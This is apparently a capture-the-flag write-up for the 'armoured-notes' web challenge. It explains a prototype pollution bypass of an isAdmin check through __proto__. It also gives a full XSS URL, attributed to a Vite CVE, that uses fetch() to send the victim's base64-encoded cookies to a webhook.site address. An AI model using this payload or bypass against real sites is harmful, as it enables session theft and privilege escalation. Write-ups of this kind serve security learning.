web/armoured-notes

Exploiting prototype pollution in combination with Cross-Site Scripting (XSS) through the recently discovered CVE-2023-49293 vulnerability can result in stealing admin bot cookies.

Basic overview

We have a login page after checking server login logic

app.post("/create", async (req, res, next) => {
    let obj = duplicate(req.body);

    if (obj.uname === "admin" && obj.pass == process.env.PASSWORD) {
      obj.isAdmin = true;
    }
    if (obj.isAdmin) {
      const newEntry = req.body;

      try {
        const result = await diaryCollection.insertOne(newEntry);
        return res.json({ code: result.insertedId });
      } catch (err) {
        console.error("Failed to insert entry", err);
        return res.status(500).json({ code: "err" });
      }
    }
    return res.json({ code: "err" });
  });

request body is passed to duplicate function let's check it

const escapeHtmlReplaceMap = {
    '&': ';',
    "'": ';',
    '`': ';',
    '"': ';',
    '<': ';',
    '>': ';',
    "!":";",
    "_":";",
    "-":";",
    "*":";",
    "[":";",
    "{":";",
    "}":";",
    "|":";",
    "/":";",
    '"':";",
    '(':";",
    ')':";",
  }
  
  /**
   * @param {string} string
   * @returns {string}
   */
  export function escapeHtml(string) {
    return string.replace(/[&'`"<>]/g, (match) => escapeHtmlReplaceMap[match])
  }

  export function duplicate(body) {
    let obj={}
    let keys = Object.keys(body);
    keys.forEach((key) => {
      if(key !== "isAdmin")
      obj[key]=body[key];
    })
    return obj;
  }

purpose of this duplicate function is to create a shallow copy of the input object (body) while excluding the property "isAdmin" from the copy.

When creating a copy of an existing object in JavaScript, there is a possibility of encountering prototype pollution vulnerabilities.

When sending this request we can add isAdmin in __proto__ to get access

We can go to /post/658046ca99d634eec4c73704 to edit our payload

After researching for a while i found there was a CVE in Vite. 

http://34.132.132.69:8001/posts/657dfc4055f7b8765176bfe3/?%22%3E%3C/script%3E%3Cscript%3Efetch(%27https://webhook.site/16970ec7-2980-48d2-a5b5-1697e839440c?flag=%27+btoa(document.cookie))%3C/script%3E

decoding the base64 encoded cookie.

Nextweb/php_sucks

Last updated